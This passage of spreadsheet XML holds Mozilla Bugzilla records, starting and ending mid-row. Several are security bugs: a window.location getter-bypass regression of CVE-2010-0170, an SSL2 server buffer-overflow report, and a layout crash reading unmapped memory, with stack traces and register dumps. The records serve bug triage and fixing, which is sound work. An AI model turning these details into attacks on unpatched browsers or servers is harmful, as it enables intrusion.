        <v>735073</v>
      </c>
      <c r="B5108" t="inlineStr">
        <is>
          <t>2012-03-12 15:24:31 -0700</t>
        </is>
      </c>
      <c r="C5108" t="inlineStr">
        <is>
          <t>Plugins can be fooled by window.location (again)</t>
        </is>
      </c>
      <c r="D5108" t="inlineStr">
        <is>
          <t>2012-10-16 02:32:12 -0700</t>
        </is>
      </c>
      <c r="E5108" t="n">
        <v>1</v>
      </c>
      <c r="F5108" t="n">
        <v>1</v>
      </c>
      <c r="G5108" t="n">
        <v>3</v>
      </c>
      <c r="H5108" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5108" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5108" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5108" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5108" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5108" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5108" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5108" t="inlineStr">
        <is>
          <t>[sg:high (at least)][qa!]</t>
        </is>
      </c>
      <c r="Q5108" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5108" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5108" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5108" t="n">
        <v>1</v>
      </c>
      <c r="U5108" t="n">
        <v>0</v>
      </c>
      <c r="V5108" t="n">
        <v>22</v>
      </c>
      <c r="W5108" t="inlineStr">
        <is>
          <t>Created attachment 605161
testcase
Looks like we regressed CVE-2010-0170 (bug 541530) some time ago. Probably with compartments.
We've theoretically got test coverage for it: http://mxr.mozilla.org/mozilla-central/source/dom/tests/mochitest/bugs/test_bug541530.html
Unfortunately, the test coverage gets fooled when window.location.__defineGetter__ doesn't exist, and incorrectly concludes that the object is immutable. But we can easily do window.__defineGetter__.apply(window.location, ...) and do the same thing. Ruh roh (testcase attached).
I discovered this when I broke this test with my location wrapper changes in compartment-per-global, and started wondering how we currently deal with the problem.
I already need to change this stuff around to work right with my compartment-per-global changes. So I think the safest and most discrete approach is for me to just fix it there (bug 733984), and then backport to branches later if need be.
Thoughts?</t>
        </is>
      </c>
      <c r="X5108" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5109">
      <c r="A5109" t="n">
        <v>991981</v>
      </c>
      <c r="B5109" t="inlineStr">
        <is>
          <t>2014-04-03 17:58:49 -0700</t>
        </is>
      </c>
      <c r="C5109" t="inlineStr">
        <is>
          <t>Lingering issues after bug 982974</t>
        </is>
      </c>
      <c r="D5109" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:47 -0700</t>
        </is>
      </c>
      <c r="E5109" t="n">
        <v>1</v>
      </c>
      <c r="F5109" t="n">
        <v>1</v>
      </c>
      <c r="G5109" t="n">
        <v>3</v>
      </c>
      <c r="H5109" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5109" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5109" t="inlineStr">
        <is>
          <t>JavaScript: Standard Library</t>
        </is>
      </c>
      <c r="K5109" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5109" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5109" t="inlineStr">
        <is>
          <t>[reviewers: read comment 133][qa-][adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q5109" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5109" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5109" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T5109" t="n">
        <v>1</v>
      </c>
      <c r="U5109" t="n">
        <v>0</v>
      </c>
      <c r="V5109" t="n">
        <v>215</v>
      </c>
      <c r="W5109" t="inlineStr">
        <is>
          <t>To be elaborated after I'm sure this bug's been filed with the right security bits set to keep it hidden, given we now have multiple security-sensitive checkboxen to consider.</t>
        </is>
      </c>
      <c r="X5109" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5110">
      <c r="A5110" t="n">
        <v>148458</v>
      </c>
      <c r="B5110" t="inlineStr">
        <is>
          <t>2002-05-31 17:37:11 -0700</t>
        </is>
      </c>
      <c r="C5110" t="inlineStr">
        <is>
          <t>Netscape Radio crashes using Real Player if another plugin is being installed in another window because scripting any plugin in other window after plugins.refresh(1) causes this crash when plugin has been unloaded - N70PR1 [@ NPPL3260.DLL - XPTC_Invoke...</t>
        </is>
      </c>
      <c r="D5110" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5110" t="n">
        <v>1</v>
      </c>
      <c r="F5110" t="n">
        <v>1</v>
      </c>
      <c r="G5110" t="n">
        <v>6</v>
      </c>
      <c r="H5110" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5110" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5110" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5110" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5110" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5110" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5110" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5110" t="inlineStr">
        <is>
          <t>[adt2 RTM] [PL RTM][verified-trunk]</t>
        </is>
      </c>
      <c r="Q5110" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5110" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5110" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T5110" t="n">
        <v>1</v>
      </c>
      <c r="U5110" t="n">
        <v>0</v>
      </c>
      <c r="V5110" t="n">
        <v>38</v>
      </c>
      <c r="W5110" t="inlineStr">
        <is>
          <t>This is the same problem just in simpler form as bug:
http://bugscape.netscape.com/show_bug.cgi?id=15482
Steps to reproduce:
1. Ensure RealPlayer is installed correctly -- if not locate and copy
nppl3260.dll and nppl3260.xpt to your plugins folder.
2. Visit http://radio.netscape.com Launch the player and listen to a station
3. In your plugins folder, do a 'touch *' to ensure we scan
4. In the other browser window, in the URL bar type: 
javascript:navigator.plugins.refresh(1);
5. Now try to control the Radio. Change the volume or station, for example.
6. Noice this crash:
NPPL3260! 6155a6a3()
XPTC_InvokeByIndex(nsISupports * 0x046767a4, unsigned int 3, unsigned int 2,
nsXPTCVariant * 0x0012e968) line 106
XPCWrappedNative::CallMethod(XPCCallContext &amp; {...}, XPCWrappedNative::CallMode
CALL_METHOD) line 1994 + 42 bytes
XPC_WN_CallMethod(JSContext * 0x032f4e38, JSObject * 0x03d2d910, unsigned int 1,
long * 0x03e85190, long * 0x0012ec18) line 1266 + 14 bytes
js_Invoke(JSContext * 0x032f4e38, unsigned int 1, unsigned int 0) line 788 + 23
bytes
js_Interpret(JSContext * 0x032f4e38, long * 0x0012f538) line 2743 + 15 bytes
js_Invoke(JSContext * 0x032f4e38, unsigned int 1, unsigned int 2) line 805 + 13
bytes
nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJSClass * const 0x02a66c20,
nsXPCWrappedJS * 0x0319d4e0, unsigned short 3, const nsXPTMethodInfo *
0x01065d00, nsXPTCMiniVariant * 0x0012fa2c) line 1193 + 21 bytes
nsXPCWrappedJS::CallMethod(nsXPCWrappedJS * const 0x0319d4e0, unsigned short 3,
const nsXPTMethodInfo * 0x01065d00, nsXPTCMiniVariant * 0x0012fa2c) line 430
PrepareAndDispatch(nsXPTCStubBase * 0x0319d4e0, unsigned int 3, unsigned int *
0x0012fadc, unsigned int * 0x0012facc) line 115 + 31 bytes
SharedStub() line 139
nsXMLHttpRequest::RequestCompleted() line 970
nsXMLHttpRequest::OnStopRequest(nsXMLHttpRequest * const 0x03801918, nsIRequest
* 0x03ad5c68, nsISupports * 0x00000000, unsigned int 0) line 882
nsStreamListenerTee::OnStopRequest(nsStreamListenerTee * const 0x03057138,
nsIRequest * 0x03ad5c68, nsISupports * 0x00000000, unsigned int 0) line 66
nsHttpChannel::OnStopRequest(nsHttpChannel * const 0x03ad5c6c, nsIRequest *
0x0362367c, nsISupports * 0x00000000, unsigned int 0) line 2915
nsOnStopRequestEvent::HandleEvent() line 213
nsARequestObserverEvent::HandlePLEvent(PLEvent * 0x03ca5e7c) line 116
PL_HandleEvent(PLEvent * 0x03ca5e7c) line 596 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00b29e88) line 526 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x0012067a, unsigned int 49362, unsigned int 0,
long 11705992) line 1077 + 9 bytes
What I can see is going on is that the plugin instance is being stopped by the
host by the refresh command. Normally a reload of the page should start the
instance back up, but this does not happen because it's in another window. If I
hack around that problem, it still crashes. I think something is trying to
access the plugin in the unload handler or some mouse event.
Does anyone know if it would be possible to check for a valid plugin instance
before allowing the call in? Can XPConnect somehow be "reset"?</t>
        </is>
      </c>
      <c r="X5110" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5111">
      <c r="A5111" t="n">
        <v>364323</v>
      </c>
      <c r="B5111" t="inlineStr">
        <is>
          <t>2006-12-19 00:40:17 -0800</t>
        </is>
      </c>
      <c r="C5111" t="inlineStr">
        <is>
          <t>SSL2 server vulnerability reported</t>
        </is>
      </c>
      <c r="D5111" t="inlineStr">
        <is>
          <t>2007-03-20 17:50:30 -0700</t>
        </is>
      </c>
      <c r="E5111" t="n">
        <v>1</v>
      </c>
      <c r="F5111" t="n">
        <v>1</v>
      </c>
      <c r="G5111" t="n">
        <v>3</v>
      </c>
      <c r="H5111" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5111" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5111" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5111" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L5111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5111" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5111" t="inlineStr">
        <is>
          <t>[sg:critical?] server-only [needs testcase] details in comment 1 private to give servers time to upgrade</t>
        </is>
      </c>
      <c r="Q5111" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5111" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5111" t="inlineStr">
        <is>
          <t>3.11.5</t>
        </is>
      </c>
      <c r="T5111" t="n">
        <v>1</v>
      </c>
      <c r="U5111" t="n">
        <v>0</v>
      </c>
      <c r="V5111" t="n">
        <v>10</v>
      </c>
      <c r="W5111" t="inlineStr">
        <is>
          <t>This vulnerability was reported to security@mozilla.org by email from 
vendor-disclosure@idefense.com, bearing the subject IDEF1994.  It says:
"This vulnerability was reported to iDefense by regenrecht."
According to the report, NSS "may allow an attacker to cause a stack-based 
buffer overflow and execute arbitrary code on the affected application."
The described attack occurs in SSL2 processing, in code executed only by
processes acting as SSL2 servers.  This vulnerability does not affect clients.
Disabling SSL2 is believed to be a complete defense.  Products with SSL2 
disabled are believed to be not at risk from this vulnerability.
As of this writihg, the bug is not yet confirmed.  More details will be 
provided if/when it is confirmed.</t>
        </is>
      </c>
      <c r="X5111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5112">
      <c r="A5112" t="n">
        <v>1451888</v>
      </c>
      <c r="B5112" t="inlineStr">
        <is>
          <t>2018-04-05 13:34:25 -0700</t>
        </is>
      </c>
      <c r="C5112" t="inlineStr">
        <is>
          <t>Pref telemetry for `profile.prefkey.trackingprotection.strength`</t>
        </is>
      </c>
      <c r="D5112" t="inlineStr">
        <is>
          <t>2018-04-12 08:20:58 -0700</t>
        </is>
      </c>
      <c r="E5112" t="n">
        <v>1</v>
      </c>
      <c r="F5112" t="n">
        <v>1</v>
      </c>
      <c r="G5112" t="n">
        <v>2</v>
      </c>
      <c r="H5112" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5112" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5112" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5112" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5112" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5112" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5112" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5112" t="inlineStr"/>
      <c r="Q5112" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5112" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5112" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5112" t="n">
        <v>1</v>
      </c>
      <c r="U5112" t="n">
        <v>0</v>
      </c>
      <c r="V5112" t="n">
        <v>2</v>
      </c>
      <c r="W5112" t="inlineStr">
        <is>
          <t>We are missing this in UnifiedTelemetry where we set up the prefs to send.</t>
        </is>
      </c>
      <c r="X5112" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5113">
      <c r="A5113" t="n">
        <v>1363635</v>
      </c>
      <c r="B5113" t="inlineStr">
        <is>
          <t>2017-05-09 21:58:28 -0700</t>
        </is>
      </c>
      <c r="C5113" t="inlineStr">
        <is>
          <t>tests/wpt leaked into servo mercurial repo and autoland repo</t>
        </is>
      </c>
      <c r="D5113" t="inlineStr">
        <is>
          <t>2017-05-10 20:38:13 -0700</t>
        </is>
      </c>
      <c r="E5113" t="n">
        <v>1</v>
      </c>
      <c r="F5113" t="n">
        <v>1</v>
      </c>
      <c r="G5113" t="n">
        <v>5</v>
      </c>
      <c r="H5113" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5113" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J5113" t="inlineStr">
        <is>
          <t>Servo VCS Sync</t>
        </is>
      </c>
      <c r="K5113" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5113" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5113" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5113" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5113" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5113" t="inlineStr"/>
      <c r="Q5113" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5113" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5113" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5113" t="n">
        <v>1</v>
      </c>
      <c r="U5113" t="n">
        <v>0</v>
      </c>
      <c r="V5113" t="n">
        <v>24</v>
      </c>
      <c r="W5113" t="inlineStr">
        <is>
          <t>The tests/wpt directory from the servo Git repo was somehow converted to Mercurial despite a configuration excluding it. This added &gt;100k files to the repo. That commit was subsequently autolanded.
First bad commit in the converted repo (https://hg.mozilla.org/projects/converted-servo-linear) is 5f0bb852f0fc.
First bad commit in the autoland repo is d9acbaa99119.
All bad changesets and their descendants will need to be stripped.
The converted-servo-linear repo will need to be hard stripped. We should be able to recover changesets on autoland that didn't touch servo/. Although the pushlog may be wrong.
We should be able to recover autoland quicly'ish. servo vcs sync could be offline until we figure out root cause.</t>
        </is>
      </c>
      <c r="X5113" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5114">
      <c r="A5114" t="n">
        <v>645572</v>
      </c>
      <c r="B5114" t="inlineStr">
        <is>
          <t>2011-03-27 16:21:40 -0700</t>
        </is>
      </c>
      <c r="C5114" t="inlineStr">
        <is>
          <t>Crash in xul!nsBlockInFlowLineIterator::nsBlockInFlowLineIterator   [@ nsLineBox::IndexOf ]  [@ nsLineBox::IndexOf(nsIFrame*) ]</t>
        </is>
      </c>
      <c r="D5114" t="inlineStr">
        <is>
          <t>2011-09-09 07:42:38 -0700</t>
        </is>
      </c>
      <c r="E5114" t="n">
        <v>1</v>
      </c>
      <c r="F5114" t="n">
        <v>1</v>
      </c>
      <c r="G5114" t="n">
        <v>3</v>
      </c>
      <c r="H5114" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5114" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5114" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5114" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5114" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5114" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-examined-192] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q5114" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5114" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5114" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T5114" t="n">
        <v>1</v>
      </c>
      <c r="U5114" t="n">
        <v>0</v>
      </c>
      <c r="V5114" t="n">
        <v>43</v>
      </c>
      <c r="W5114" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Build Identifier:  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Description:
The attached testcase crashes Firefox 4.0 on Linux and Windows. Marked as potential security issue as FF is accessing memory in unmapped regions.
Affected Versions:
Firefox 4.0 (Windows and Linux)
Testcase:
The testcase is attached as an HTML file. It will crash the browser on opening.
Assertions:
Following assertions are triggered before the process crashes on Linux:
###!!! ASSERTION: Dying in the middle of our own update?: 'mUpdateCount == 0', file ../../../layout/base/nsCSSFrameConstructor.h, line 89
###!!! ASSERTION: Should be in an update while destroying frames: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.cpp, line 7365
###!!! ASSERTION: Should be in an update while destroying frames: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.cpp, line 1442
###!!! ASSERTION: too many EndUpdate's: '0 != mUpdateCount', file ../../../layout/base/nsPresShell.cpp, line 3401
###!!! ASSERTION: Should be in an update while creating frames: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.cpp, line 6488
###!!! ASSERTION: too many EndUpdate's: '0 != mUpdateCount', file ../../../layout/base/nsPresShell.cpp, line 3401
###!!! ASSERTION: Should be in an update while creating frames: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.cpp, line 6488
###!!! ASSERTION: too many EndUpdate's: '0 != mUpdateCount', file ../../../layout/base/nsPresShell.cpp, line 3401
###!!! ASSERTION: Should be in an update while destroying frames: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.cpp, line 7365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Should be in an update while destroying frames: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.cpp, line 1442
###!!! ASSERTION: Instant quote updates are bad news: 'mUpdateCount != 0', file ../../../layout/base/nsCSSFrameConstructor.h, line 1788
###!!! ASSERTION: recurring into frame construction: 'mPresContext-&gt;mLayoutPhaseCount[eLayoutPhase_FrameC] == 0', file ../../../layout/base/nsPresContext.h, line 1375
Program received signal SIGSEGV, Segmentation fault.
0xf597c5c6 in ?? () from ./libxul.so
Stack Backtrace:
Following crashes have been observed:
Windows / Firefox 4.0:
(127c.838): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!nsBlockInFlowLineIterator::nsBlockInFlowLineIterator+0x8c:
6c9c7f7c 8b4020          mov     eax,dword ptr [eax+20h] ds:002b:f0de801f=????????
xul!nsBlockInFlowLineIterator::nsBlockInFlowLineIterator(class nsBlockFrame * aFrame = 0x09819df8, class nsIFrame * aFindFrame = 0x00000001, int * aFoundValidLine = 0x00000000)+0x8c
xul!nsBlockFrame::ChildIsDirty(class nsIFrame * aChild = 0x00000000)+0x2e
xul!PresShell::FrameNeedsReflow(class nsIFrame * aFrame = 0x09819b00, nsIPresShell::IntrinsicDirty aIntrinsicDirty = eStyleChange (2), unsigned int64 aBitToAdd = 0x400)+0x6c4
xul!nsTextFrame::CharacterDataChanged(struct CharacterDataChangeInfo * aInfo = 0x00000000)+0x7c
xul!nsCSSFrameConstructor::CharacterDataChanged(class nsIContent * aContent = 0x001fbec8, struct CharacterDataChangeInfo * aInfo = 0x001fc090)+0x65
xul!PresShell::CharacterDataChanged(class nsIDocument * aDocument = 0x6c969f6e, class nsIContent * aContent = 0x001fc090, struct CharacterDataChangeInfo * aInfo = 0x6d3fde1c)+0x63
xul!nsNodeUtils::CharacterDataChanged(class nsIContent * aContent = 0x09819df8, struct CharacterDataChangeInfo * aInfo = 0x001fc090)+0x85
xul!nsGenericDOMDataNode::SetTextInternal(unsigned int aOffset = 0, unsigned int aCount = 1, wchar_t * aBuffer = 0x0c35c6e8 "“", unsigned int aLength = 1, int aNotify = 1)+0x20e
xul!nsGenericDOMDataNode::SetData(class nsAString_internal * aData = 0x6d4fe160)+0x20
xul!nsCommentNode::SetData(class nsAString_internal * aData = 0x6d4fe160)+0x11
xul!nsQuoteList::RecalcAll(void)+0x48
xul!PresShell::EndUpdate+0x2e2809
xul!nsTextEditorState::SetValue(class nsAString_internal * aValue = 0x001fc398, int aUserInput = 0)+0x4e0
xul!nsTextEditorState::UnbindFromFrame(class nsTextControlFrame * aFrame = 0x098191d0)+0x408
xul!nsHTMLInputElement::UnbindFromFrame(class nsTextControlFrame * aFrame = 0x0e1e7168)+0x2e
xul!nsTextControlFrame::DestroyFrom(class nsIFrame * aDestructRoot = 0x0e1e7168)+0x31
xul!nsBlockFrame::DestroyFrom(class nsIFrame * aDestructRoot = 0x0e1e7168)+0x1bd
xul!nsFrameList::DestroyFramesFrom(class nsIFrame * aDestructRoot = 0x6c981d66)+0x1c
xul!nsCanvasFrame::DestroyFrom(class nsIFrame * aDestructRoot = 0x0e1e7168)+0x12
xul!nsContainerFrame::DestroyFrom(class nsIFrame * aDestructRoot = 0x00000000)+0x46
xul!nsHTMLScrollFrame::DestroyFrom(class nsIFrame * aDestructRoot = 0x6d01110c)+0x17
xul!nsFrameList::DestroyFrameIfPresent(class nsIFrame * aFrame = 0x001fbec8)+0x13
xul!nsContainerFrame::RemoveFrame(class nsIAtom * aListName = 0x00000001, class nsIFrame * aOldFrame = 0x00000000)+0x4f
xul!ViewportFrame::RemoveFrame(class nsIAtom * aListName = 0x00000000, class nsIFrame * aOldFrame = 0x0e1e7168)+0x2a
xul!nsFrameManager::RemoveFrame(class nsIAtom * aListName = 0x6c9ab681, class nsIFrame * aOldFrame = 0x00000000)+0x27
xul!nsCSSFrameConstructor::ContentRemoved(class nsIContent * aContainer = 0x00000000, class nsIContent * aChild = 0x0c3e9f10, class nsIContent * aOldNextSibling = 0x00000000, nsCSSFrameConstructor::RemoveFlags aFlags = REMOVE_FOR_RECONSTRUCTION (1), int * aDidReconstruct = 0x001fc5a0)+0x230
xul!nsCSSFrameConstructor::RecreateFramesForContent(class nsIContent * aContent = 0x0c3e9f10, int aAsyncInsert = 1)+0x12a
xul!nsCSSFrameConstructor::MaybeRecreateContainerForFrameRemoval+0x29e526
xul!nsCSSFrameConstructor::RecreateFramesForContent(class nsIContent * aContent = 0x0e0ce250, int aAsyncInsert = 205430547)+0xcb
xul!nsCSSFrameConstructor::ReframeContainingBlock(class nsIFrame * aFrame = 0x0cf4d440)+0x3e
xul!nsCSSFrameConstructor::MaybeRecreateContainerForFrameRemoval+0x29e3bb
xul!nsCSSFrameConstructor::ProcessRestyledFrames+0x3af7f4
xul!mozilla::css::RestyleTracker::ProcessRestyles(void)+0x30b
xul!nsCSSFrameConstructor::ProcessPendingRestyles(void)+0x24
xul!PresShell::FlushPendingNotifications(mozFlushType aType = Flush_InterruptibleLayout (4))+0x1f7
xul!PresShell::WillPaint(int aWillSendDidPaint = 145104816)+0x3d
xul!nsViewManager::DispatchEvent(class nsGUIEvent * aEvent = 0x001fd190, class nsIView * aView = 0x08aab1c0, nsEventStatus * aStatus = 0x001fd07c)+0x26d
xul!AttachedHandleEvent(class nsGUIEvent * aEvent = 0x6c8e81a1)+0x76
xul!nsWindow::DispatchEvent(class nsGUIEvent * event = 0x00000000, nsEventStatus * aStatus = 0x00000000)+0x36
xul!nsWindow::DispatchWindowEvent(class nsGUIEvent * event = 0x00000000)+0x13
xul!nsWindow::OnPaint(struct HDC__ * aDC = 0x00000000, unsigned int aNestingLevel = 0)+0xf1
xul!nsWindow::ProcessMessage(unsigned int msg = 0xf, unsigned int * wParam = 0x001fd458, long * lParam = 0x001fd45c, long * aRetValue = 0x001fd444)+0x9c
xul!nsWindow::WindowProcInternal(struct HWND__ * hWnd = 0x00000000, unsigned int msg = 0, unsigned int wParam = 0, long lParam = 0)+0xde
xul!CallWindowProcCrashProtected(&lt;function&gt; * wndProc = &lt;Memory access error&gt;, struct HWND__ * hWnd = &lt;Memory access error&gt;, unsigned int msg = &lt;Memory access error&gt;, unsigned int wParam = &lt;Memory access error&gt;, long lParam = &lt;Memory access error&gt;)+0x2e
Linux / Firefox 4.0:
Program received signal SIGSEGV, Segmentation fault.
0xf6e976e0 in ?? () from ./libxul.so
(gdb) info reg
eax            0x1	1
ecx            0x2	2
edx            0xf370c7ff	-210712577
ebx            0xf7f34ebc	-135049540
esp            0xffffb55c	0xffffb55c
ebp            0xe3fbe6c0	0xe3fbe6c0
esi            0xe4098ce8	-469136152
edi            0xe3fbe70c	-470030580
eip            0xf6e976e0	0xf6e976e0
eflags         0x10206	[ PF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99
(gdb) x/10i $eip
=&gt; 0xf6e976e0:	mov    0x20(%edx),%edx
VulnDev reference    : vd11006
reported by nils of vulndev ltd.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X5114" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5115">
      <c r="A5115" t="n">
        <v>1355451</v>
      </c>
      <c r="B5115" t="inlineStr">
        <is>
          <t>2017-04-11 05:48:11 -0700</t>
        </is>
      </c>
      <c r="C5115" t="inlineStr">
        <is>
          <t>Speculatively connect to websites on mousedown on an awesomebar item</t>
        </is>
      </c>
      <c r="D5115" t="inlineStr">
        <is>
          <t>2017-08-24 18:28:41 -0700</t>
        </is>
      </c>
      <c r="E5115" t="n">
        <v>1</v>
      </c>
      <c r="F5115" t="n">
        <v>1</v>
      </c>
      <c r="G5115" t="n">
        <v>2</v>
      </c>
      <c r="H5115" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5115" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5115" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5115" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5115" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5115" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5115" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5115" t="inlineStr">
        <is>
          <t>[reserve-photon-performance][fxsearch]</t>
        </is>
      </c>
      <c r="Q5115" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5115" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5115" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T5115" t="n">
        <v>1</v>
      </c>
      <c r="U5115" t="n">
        <v>0</v>
      </c>
      <c r="V5115" t="n">
        <v>52</v>
      </c>
      <c r="W5115" t="inlineStr">
        <is>
